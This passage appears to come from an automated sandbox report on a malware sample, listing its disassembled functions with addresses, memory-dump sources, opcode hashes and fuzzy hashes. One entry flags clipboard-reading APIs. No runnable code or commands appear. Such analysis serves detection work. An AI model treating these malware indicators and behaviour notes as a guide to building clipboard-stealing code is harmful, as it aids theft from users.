                                                                                                                                                                                                                                                                          Function 02490D90 Relevance: .0, Instructions: 43COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390855035.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                                                                                                                                                                                                                          • Instruction ID: 316fab75cdca8c204f77335740380c5cf636f58c06b371094cabf143150724a7
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0301D676A106048FDF21CF24C904BAB37F9FB86216F4555B6D90AD7381E774A941CB90
                                                                                                                                                                                                                                                                          Function 024B70E4 Relevance: .0, Instructions: 35COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390855035.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 19ed9741b84afb298707877cb2535680f06aa68bf492e7e97af849109ca09354
                                                                                                                                                                                                                                                                          • Instruction ID: 36e37f5184ae6b5f12f1d3ae35ca6bd396f784eb5bf305c7c25848572748988b
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 19ed9741b84afb298707877cb2535680f06aa68bf492e7e97af849109ca09354
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 20F06DB5E0C3808BC718CF28C44066AFBE5AB9A700F10A93ED48AA3341DB31D545CB4A
                                                                                                                                                                                                                                                                          Function 024B7797 Relevance: .0, Instructions: 32COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390855035.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 1c062fd088646d19ef1d8bd4d71c411c976c3123481e9341e85681c4dc346f69
                                                                                                                                                                                                                                                                          • Instruction ID: dafb754127db889cc387327b81ff0c84183e6fb29f7d1198a0a26455a67b0274
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1c062fd088646d19ef1d8bd4d71c411c976c3123481e9341e85681c4dc346f69
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 28F069B410D3919FC300DF29D29051BFFE0ABD5318F64EA5CE8DA5B212D334C5028B4A
                                                                                                                                                                                                                                                                          Function 0042526A Relevance: .0, Instructions: 31COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: fd5a1a9362cca19039c8d3fa2776169205ee0034e021f5660f97d99573220aa2
                                                                                                                                                                                                                                                                          • Instruction ID: 26823722f3a6afcc10447d79cbf8b06261be6e3c3bcefc34e32834821d37eed0
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fd5a1a9362cca19039c8d3fa2776169205ee0034e021f5660f97d99573220aa2
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D4F0EDB5A88301BAF6248A00DD43F67B6A89755B04F301519B344790E1E5E1F559870E
                                                                                                                                                                                                                                                                          Function 024B54D1 Relevance: .0, Instructions: 31COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390855035.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 15be5673a4952075455a6c2d450438e7f22dd3e3a56e71dfeee11c81b82dc352
                                                                                                                                                                                                                                                                          • Instruction ID: bf3276d5db2ddd71b26ab661fc93688d98b36442342a27f76758d7edce35ef5b
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 15be5673a4952075455a6c2d450438e7f22dd3e3a56e71dfeee11c81b82dc352
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 52F0EDB5A88301BEF6249A01CC43F6BB6B49B55B04F30152DB344790E0F5E1B5498B0E
                                                                                                                                                                                                                                                                          Function 0043AAB2 Relevance: .0, Instructions: 29COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 130b8f035e0f9caf36d69ffe2fe00e5717c81f35e5d13109d0f780a603360f32
                                                                                                                                                                                                                                                                          • Instruction ID: fe1efda9bcc16308283c5424634e62067ac2dc8fe4a9505e7820fcb65e305570
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 130b8f035e0f9caf36d69ffe2fe00e5717c81f35e5d13109d0f780a603360f32
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B1F0A735B456808BE704CF38D82155BBBE2E38B324F185A7DD681D3751D639C8018609
                                                                                                                                                                                                                                                                          Function 024CAD19 Relevance: .0, Instructions: 29COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390855035.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 130b8f035e0f9caf36d69ffe2fe00e5717c81f35e5d13109d0f780a603360f32
                                                                                                                                                                                                                                                                          • Instruction ID: e9e37191ca131b7bd35de4a38a45ac0981d22013e653bb1db83e87ad9d4c0b5e
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 130b8f035e0f9caf36d69ffe2fe00e5717c81f35e5d13109d0f780a603360f32
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A7F0A739B456808BE704CF38E82195BBBE2E387228F145A7DD641D3751DB39C8018605
                                                                                                                                                                                                                                                                          Function 024B63B6 Relevance: .0, Instructions: 22COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390855035.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 7004a593075d1604d820592827f960a74d411a36b63cc4088cdb0a0f645b001a
                                                                                                                                                                                                                                                                          • Instruction ID: 125372f5d3b68d82b85b5642a72c563733b032824caca2ff8a440a1607dfe248
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7004a593075d1604d820592827f960a74d411a36b63cc4088cdb0a0f645b001a
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D5D05E2590C67A824A2B4E1805501FEA72A4F03515B0B75E6DCE1BF682DBE6C9476278
                                                                                                                                                                                                                                                                          Function 024CC268 Relevance: .0, Instructions: 8COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390855035.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 39f376952ae625b8b9e581a4d9adace311e733e6b5fc1a80656dd2f6c93a6218
                                                                                                                                                                                                                                                                          • Instruction ID: 979b3066809f2b39c8d4e254b46c6f556eea9d2a5e27a8b6f776bea0b7d6dcb5
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 39f376952ae625b8b9e581a4d9adace311e733e6b5fc1a80656dd2f6c93a6218
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1AB002759486418FC644DF18D584974F7F5AB0B211F1564549589E7222D220D8408A19
                                                                                                                                                                                                                                                                          Function 024CC79B Relevance: .0, Instructions: 7COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390855035.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: 89a247458966beb6ee1323d7209a08a94252eab5608dc6956c606f04d9c1587d
                                                                                                                                                                                                                                                                          • Instruction ID: 10c72ce3a0ca8e08a8575cf423c81d1ec4165de9f21f41d416b206e48e332a4b
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 89a247458966beb6ee1323d7209a08a94252eab5608dc6956c606f04d9c1587d
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FDA00239E5C40197CA08CF20A854871E2BA6B5F204FA134288106B7C52D951D500854C
                                                                                                                                                                                                                                                                          Function 024B559D Relevance: .0, Instructions: 7COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390855035.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                          • Opcode ID: dbeba292ae877db911bd2f22180c16664a0dc2a699d78ed72cdc2ede8be8a5c3
                                                                                                                                                                                                                                                                          • Instruction ID: 70204a4f19da818e306c590333116dd845209fb171f96af6639338c1a50bb7b2
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dbeba292ae877db911bd2f22180c16664a0dc2a699d78ed72cdc2ede8be8a5c3
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 38B00254855145D6D704CF10D905575F270BF43705F10F655A40437160D3B4C248870E
                                                                                                                                                                                                                                                                          Function 024C1337 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 114clipboardCOMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390855035.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
                                                                                                                                                                                                                                                                          • String ID: ($P$W$]$j$x
                                                                                                                                                                                                                                                                          • API String ID: 2832541153-1642767450
                                                                                                                                                                                                                                                                          • Opcode ID: b4901ee308e120f21ffea64ecbaed060110f6934b44995572f39dda3de49c7f5
                                                                                                                                                                                                                                                                          • Instruction ID: 1209ac60c52be1ee3d2609d382f462b43dac307b6badfe25585f3bede4718c51
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b4901ee308e120f21ffea64ecbaed060110f6934b44995572f39dda3de49c7f5
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 61418E7050C7818FD341AF7C988836FBEE09F86314F084A7EE4DA86392D6788549C797
                                                                                                                                                                                                                                                                          Function 0042F83B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 85COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Variant$ClearInit
                                                                                                                                                                                                                                                                          • String ID: L
                                                                                                                                                                                                                                                                          • API String ID: 2610073882-2909332022
                                                                                                                                                                                                                                                                          • Opcode ID: 27f71955ec06eb12b5b306dc881331dba57b9c572ded71c52751796e6aae7b46
                                                                                                                                                                                                                                                                          • Instruction ID: 6db3269f84c82bd33a71f1d72ed2fa7cb36160b769e4d9c9dbaa52e299ac7a35
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 27f71955ec06eb12b5b306dc881331dba57b9c572ded71c52751796e6aae7b46
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 40413A7110CBC18ED321DB38844865EBFE16BE6220F588AADE5E5873E2D674854ACB53
                                                                                                                                                                                                                                                                          Function 024BFAA2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 85COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390855035.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Variant$ClearInit
                                                                                                                                                                                                                                                                          • String ID: L
                                                                                                                                                                                                                                                                          • API String ID: 2610073882-2909332022
                                                                                                                                                                                                                                                                          • Opcode ID: 27f71955ec06eb12b5b306dc881331dba57b9c572ded71c52751796e6aae7b46
                                                                                                                                                                                                                                                                          • Instruction ID: 3ad9b868c03ac49d6ff77bb70abfbb19bf88551a758c6b1064517cd83c371392
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 27f71955ec06eb12b5b306dc881331dba57b9c572ded71c52751796e6aae7b46
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BF412B7110CBC18ED321DB38845869EBFD16FE6220F188A9DE5F5873E2D674854ACB53
                                                                                                                                                                                                                                                                          Function 004322BB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 81COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: MetricsSystem
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 4116985748-3916222277
                                                                                                                                                                                                                                                                          • Opcode ID: c208063e004baaaa8ceb91fa553bdd71456cfb1a6ec307733573892fb2cdbb50
                                                                                                                                                                                                                                                                          • Instruction ID: c9a1f8c58fc854c7343cd62f2f50c2794f568aca7ada01e3bbf97962732916ca
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c208063e004baaaa8ceb91fa553bdd71456cfb1a6ec307733573892fb2cdbb50
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BB3183B09143048FDB40EF69E98965EBBF4BB88304F01853EE499DB360D7749948CF86
                                                                                                                                                                                                                                                                          Function 0040B9D0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 10COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.2390370937.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.2390370937.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_5Z19n7XRT1.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: FreeLibrary
                                                                                                                                                                                                                                                                          • String ID: #v
                                                                                                                                                                                                                                                                          • API String ID: 3664257935-554117064
                                                                                                                                                                                                                                                                          • Opcode ID: 8501977874cf33a4c46fa7807dbe23817083d533ce9f3e4674829aa3b3398596
                                                                                                                                                                                                                                                                          • Instruction ID: 58510d58c826e4dda8c4a846b9b6f57f468079e8869e8656342225e30f6071e8
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8501977874cf33a4c46fa7807dbe23817083d533ce9f3e4674829aa3b3398596
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 03C002B98089009BDF416FB5FE0A8293EA5EB4670670201F4FC0951433DB3A0926EB99